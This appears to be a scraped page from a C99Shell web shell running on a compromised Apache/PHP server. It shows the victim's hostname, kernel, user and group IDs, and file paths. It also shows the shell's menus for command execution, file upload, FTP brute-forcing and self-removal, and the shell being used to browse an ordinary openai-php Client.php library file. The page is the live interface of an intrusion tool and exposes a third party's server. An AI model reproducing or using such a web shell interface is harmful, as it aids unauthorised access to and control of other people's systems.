!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ai.picotech.app/public_html/vendor/openai-php/client/src/   drwxrwxr-x
Free 29 GB of 117.98 GB (24.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Client.php (3.32 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
OpenAI;

use 
OpenAI\Contracts\Transporter;
use 
OpenAI\Resources\Audio;
use 
OpenAI\Resources\Chat;
use 
OpenAI\Resources\Completions;
use 
OpenAI\Resources\Edits;
use 
OpenAI\Resources\Embeddings;
use 
OpenAI\Resources\Files;
use 
OpenAI\Resources\FineTunes;
use 
OpenAI\Resources\Images;
use 
OpenAI\Resources\Models;
use 
OpenAI\Resources\Moderations;

final class 
Client
{
    
/**
     * Creates a Client instance with the given API token.
     */
    
public function __construct(private readonly Transporter $transporter)
    {
        
// ..
    
}

    
/**
     * Given a prompt, the model will return one or more predicted completions, and can also return the probabilities
     * of alternative tokens at each position.
     *
     * @see https://beta.openai.com/docs/api-reference/completions
     */
    
public function completions(): Completions
    
{
        return new 
Completions($this->transporter);
    }

    
/**
     * Given a chat conversation, the model will return a chat completion response.
     *
     * @see https://platform.openai.com/docs/api-reference/chat
     */
    
public function chat(): Chat
    
{
        return new 
Chat($this->transporter);
    }

    
/**
     * Get a vector representation of a given input that can be easily consumed by machine learning models and algorithms.
     *
     * @see https://beta.openai.com/docs/api-reference/embeddings
     */
    
public function embeddings(): Embeddings
    
{
        return new 
Embeddings($this->transporter);
    }

    
/**
     * Learn how to turn audio into text.
     *
     * @see https://platform.openai.com/docs/api-reference/audio
     */
    
public function audio(): Audio
    
{
        return new 
Audio($this->transporter);
    }

    
/**
     * Given a prompt and an instruction, the model will return an edited version of the prompt.
     *
     * @see https://beta.openai.com/docs/api-reference/edits
     */
    
public function edits(): Edits
    
{
        return new 
Edits($this->transporter);
    }

    
/**
     * Files are used to upload documents that can be used with features like Fine-tuning.
     *
     * @see https://beta.openai.com/docs/api-reference/files
     */
    
public function files(): Files
    
{
        return new 
Files($this->transporter);
    }

    
/**
     * List and describe the various models available in the API.
     *
     * @see https://beta.openai.com/docs/api-reference/models
     */
    
public function models(): Models
    
{
        return new 
Models($this->transporter);
    }

    
/**
     * Manage fine-tuning jobs to tailor a model to your specific training data.
     *
     * @see https://beta.openai.com/docs/api-reference/fine-tunes
     */
    
public function fineTunes(): FineTunes
    
{
        return new 
FineTunes($this->transporter);
    }

    
/**
     * Given a input text, outputs if the model classifies it as violating OpenAI's content policy.
     *
     * @see https://beta.openai.com/docs/api-reference/moderations
     */
    
public function moderations(): Moderations
    
{
        return new 
Moderations($this->transporter);
    }

    
/**
     * Given a prompt and/or an input image, the model will generate a new image.
     *
     * @see https://beta.openai.com/docs/api-reference/images
     */
    
public function images(): Images
    
{
        return new 
Images($this->transporter);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--